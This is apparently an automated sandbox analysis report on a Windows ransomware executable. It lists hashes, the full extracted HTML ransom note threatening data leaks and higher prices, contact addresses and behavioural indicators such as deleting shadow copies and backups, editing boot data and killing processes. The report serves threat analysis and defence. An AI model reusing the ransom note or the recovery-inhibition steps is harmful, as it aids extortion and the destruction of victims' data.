cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9

Analysis

max time kernel
151s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
Size

332KB
MD5

10c5fde0d48f9058490705ce7646d73b
SHA1

204eaa05dd25c6d71cef19b16c0cd232b05e1ae8
SHA256

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9
SHA512

7d37506597ca2e8bf624d0c6fca592e72e436fe4b906ac6334a4ff6b57f363834bf35f1038209e6bf67d43b39f538b7ebdd72a2b268dd1297bf6c99728e48854
SSDEEP

6144:Sq9ezqsEC8dS7CCKUf+9xwL1ZTcDCzyrxQX3hVds+tfCOu3miq/RiXq:S4JsE3CKUf+9xwL15cDCzie1ChhXq

Score

10^/10

evasion ransomware

Malware Config

Extracted

Path

\Device\HarddiskVolume1\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">49ybdElBH/l23OCnOhdOf4NZlplJtGDo57j9EdQzqjudwaf0ELfpyxjUURCh9+s5pQfUoTbZoKuHJ4XcepeHU3ZFVwkEfev+q7oBxe/bCBy+uRSzzxNNbwL8HnVDPIokGLr6Hn8sUkhohlvCBt/ve91egBzDNmavOJOE3ZArSUAKOnt1t23CSPhWwDGorSqaJ0AMhY3buA6DLw9lbzMxt1iU1zshqyvWVw9Fb7yliy6tqPW+uVwl52Gur9cqHFqKkq3+KkKtmlUqVKFlLDDwVzT8hCUcm97+yrczcilEXrS6W5wDl78Y4R9Tr/nZhMWN2EZv/CUi+x1wXGLn9Jyamghq1K/9bC3Dl/Co1wlpklH7VOGXD1Rv1qJoUAI+pp/dLzbpLNCH3beVPNOuq94PCBFKwCX+T67+ON+zROOveSKou4G7Luf7+fKh2DgyTU2yBjISR2ZcSAo60MvwzZgQ+FLVCpxp/j/47sRAhGPvc1ctrs3zqS1R2BkqBQsoGywf8B+v2O/ZPi2+Hta+BLehRNI4rJkDJqKYSpWzF76PyqlAI1yNlO+LuVu67FaqQ2QVoyRreVQE7Js/nkyPjnadrZYjIcsWyWja7B3ITR7vqqJW40nC9bf81Q96BiJ97qG0poh2RE5lrQz4s3pMHXztIgsO39t7vxOF7JK/oAviOaMFc4Jc8SR+8gf34zTgz7IgzBTMHw105Cq4Pu13O5VjPX1z9pc+ucz4nef1uIIz/pCKhTTs18WQOq2D0tFgVIEQdiUtWUuQ5EgTs2IAKyYNTLjTdJVlnwhkiCgLHVTWU9Zl9VbdXHc6D9v+QnnIECNBVoJLXMcUEQrtMpSXw4zDeuYRjASTnD/QCY7E/wiG+H/DVO1jaVgzWAdhs/Pyq4Ukmq12F0lXzoYLwUSEPh/7ivvjEee5CDiI4i1RMUYnHUsrCDgoVLVE6imH2cnzsboUfNhv0734D8zmwYxB7BwbImTJLyXJog7/WlKsvqMFH7FbnfVS4aFpzbYyEqWjZEfdDyDMqezgq4H9Q9KNIv6GFPU7X8MCi0IQfsjDp1luHyonXiX26u1ADyUCF0mPWJql+RJ0w9I80utTmaBJ5z5MVUwPpTIiO8+Io0CeDzhAmNVZMI4Yd4sGHr0ZN9vl3+kVCOrVXRtZthuDy2+nX7IBQw6IRkEBXhkWZCKy4CocwA2tOtURw0qengS6KBLbc2EGZbb9KtNutPgLQAYhopdo7fZ57gzNIzFpHeh61gdi6tqoaR24ceU/qsCNaMr6usydfxMcMiFmiRyTxfoZqd0aVc1MZ4pcSanl0Xqcvb9CIGpbEXDubLIh3F67UDgaPPGt9sR7CfiU5AAJGZMS/yfiMT2MBD5EQ8kArVkEgnHnJdq+a40Gusa3VvXrMrEvizUAY5edXe0byxua5RTEzh0qhvnxNEMEeQ4lUaxlAiP1qDza2SBgYTE2tiR4ljAx3nsTVdGDoWXpDyC+dDkOlzIZprI5JWcXch7yanh0Eq1Gpl3HYIwFb7Q6RyXgmo1yEA180YxGRm15f8/TipnxCZGz4/LL4PqUhCGJc7UUPkgQJnqt8P55awWcxfgBE9nDBUfg+PFpFaR7VN2AhlQ1i8zxyFDto/CfYEhSeLzIUhTTN2/vqeTBiKHSSxGZNrIp4GEQyUKHjkXB7Bgj1sG2YKG/e+8vPcvPvyx4MUx6Uabn7y0=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> <p>* Tor-chat to always be in touch: <a href<a href<b> </div> </div> </div>  <b> <b> <b> <span style="font-size: 22px">qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</span> </b><br><br> </b><br>  </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

description pid process target process

PID 1752 created 1208 1752 cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

2164 bcdedit.exe
2620 bcdedit.exe
Renames multiple (7582) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

1540 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2532 wbadmin.exe

description	pid	process	target process
PID 1752 created 1208	1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe	Explorer.EXE

pid	process
2164	bcdedit.exe
2620	bcdedit.exe

pid	process
1540	wbadmin.exe

pid	process
2532	wbadmin.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.execipher.execipher.exe

description	ioc	process
File opened (read-only)	\??\A:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\H:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\I:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\S:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\V:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\K:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\W:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\G:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\L:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\U:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\Z:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\J:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\Q:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\T:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\F:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\P:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\E:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\O:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\X:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\M:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\N:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\R:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\B:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened (read-only)	\??\Y:	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

Drops file in Program Files directory 64 IoCs

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MENU98.POC	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099195.GIF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Media Player\en-US\wmpnscfg.exe.mui	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Status.accft	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\2 Right.accdt	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Beirut	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange.css	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV.HXS	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\localizedStrings.js	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292286.WMF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48F.GIF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\WARN.WAV	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\nl.pak	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\Java\jre7\lib\applet\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\settings.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\es-ES\bckgzm.exe.mui	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\Windows Photo Viewer\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_s.png	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\THMBNAIL.PNG	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\VGX\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\es-ES\wmplayer.exe.mui	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14581_.GIF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\js\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\THMBNAIL.PNG	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ENES\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN02559_.WMF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\js\picturePuzzle.js	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CANYON\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.HXS	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\WSS_DocLib.ico	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.TLB	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files\ConvertSelect.aif	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\How_to_back_files.html	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2736 vssadmin.exe

pid	process
2736	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1984	taskkill.exe
860	taskkill.exe
1964	taskkill.exe
2804	taskkill.exe
2524	taskkill.exe
2960	taskkill.exe
1592	taskkill.exe
1536	taskkill.exe
2496	taskkill.exe
2260	taskkill.exe
2320	taskkill.exe
2632	taskkill.exe
2724	taskkill.exe
2752	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe

pid	process
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
1752	cf3b068448640298738c2a407427335a289832d0c0013fda10e0fceceb208cd9.exe
